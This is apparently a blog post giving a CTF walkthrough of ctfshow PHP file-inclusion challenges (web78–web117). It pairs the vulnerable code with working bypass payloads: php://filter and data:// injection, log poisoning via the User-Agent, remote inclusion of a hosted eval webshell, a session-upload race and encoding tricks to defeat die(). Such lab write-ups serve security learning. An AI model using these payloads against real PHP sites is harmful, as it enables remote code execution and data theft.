ctfshow file contains

web78 unprotected read source code

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
} 

base64 decryption after pseudo protocol reading

php://filter/read=convert.base64-encode/resource=flag.php

web79 data protocol

 <?php
 if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

PHP is filtered. PHP can be bypassed with uppercase, but PHP in the file name flag.php cannot be case sensitive, so using functions such as cat can avoid PHP entering the file name. You can also bypass PHP directly

?file=data://text/plain,<?PHP system('tac fl*');?>


?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

web80 input protocol

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

php data is filtered. Here we try the following php://input Successfully, I looked at bp and used the log file

get:?file=phP://input
post: <?PHP system('tac fl*');?>

After the url or UA operation, it will be recorded in the log. At this time, the execution effect can be achieved by including the log file

for the first time: User-Agent: <?php system('tac fl*');?>

The second time:?file=/var/log/nginx/access.log

This problem can also be included in remote files. After uploading, you can directly connect with ant sword or execute commands directly

xxxx For your own website:?file=http://xxxx/shell.txt
shell.txt Medium:<?php eval($_POST[1]);?>
1=system('tac f*');

web81 contains logs

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 

One more filter: try to include the log file here. It is found that it is still possible. Use the previous method

for the first time: User-Agent: <?php system('tac fl*');?>

The second time:?file=/var/log/nginx/access.log

More filtering: so remote file inclusion must be hopeless

web82 session.upload_progress

New knowledge points, the main idea is to upload controllable PHP_SESSION_UPLOAD_PROGRESS temporary file and use it as a springboard to access / tmp/sess_xxx freebuf explanation , due to temporary files, we also need to conduct conditional competition. We can write scripts or directly conduct burst attacks through burp. Here are the steps to do the problem
First make your own web page and modify the address

<!DOCTYPE html>
<html>
<body>
<form action="http://ff1886cd-dda8-48a2-8182-c1b98d685973.challenge.ctf.show:8080" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>

Capture packets after uploading

This web page is used to upload temporary files. Next, we will catch a visited web page through the topic web page. Of course, knowing the address of the temporary file is also a condition to take advantage of this vulnerability

After the above two web pages are completed, they start to burst at the same time. One is used to create temporary files and the other is used to access them. Through such conditional competition, they can achieve the purpose of utilization.

Then modify the command to cat flag

web83 delete uninitialized session

After web84 deletes all temporary files, the file contains

As long as I blow up fast enough, rm can't keep up with me

web85 check < angle brackets

web86 defines the include path

web87 rot13

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('Big man, stop showing');?>".$content);
    
}else{
    highlight_file(__FILE__);
} 

File writing can be bypassed by base64 or rot13. Because urlcode exists in the title, two url codes are required

php://filter/write=string.rot13/resource=1.php twice url encoding
get: ?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
<?php system('tac f*');?>
post: content=<?cuc flfgrz('gnp s*');?>

Visit 1.php and find that it is successfully written to get a flag or base64, but this is very simple

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
} 

If there is no filter: / /, then directly use cat flag

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZionKTs/Pg

web116 foremost split picture

Save the video on the desktop in this way, throw it into 010, find the PNG picture prefix, and use foremost to separate it


It is found that it is the source code. Some of the previous filters are useless because there is a file_get_contents() function, so you can directly read the flag, but you can only view the packet

?file=flag.php

?file=compress.zlib:///var/www/html/flag.php

web117 bypass die

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
        die('too young too simple sometimes naive!');
    }
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents); 

No matter what is passed here, there will be a <? php die();?>, Therefore, first of all, we need to bypass die (). If file and contents are identified by "special methods" such as base64 and rot13, then <? PHP die();? > will also be specialized, so it will lose its usefulness. However, base and rot are prohibited here, so we have to adopt something similar Character set encoding supported by php Here, ucs-2le and ucs-2be are used to exchange two characters

get: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post: contents=?<hp pvela$(P_SO[T]1;)>?

Then pass the parameters directly in the a.php page

get: a.php
post: 1=system('tac f*');

Tags: PHP CTF

Posted on Sun, 19 Sep 2021 08:23:04 -0400 by Renlok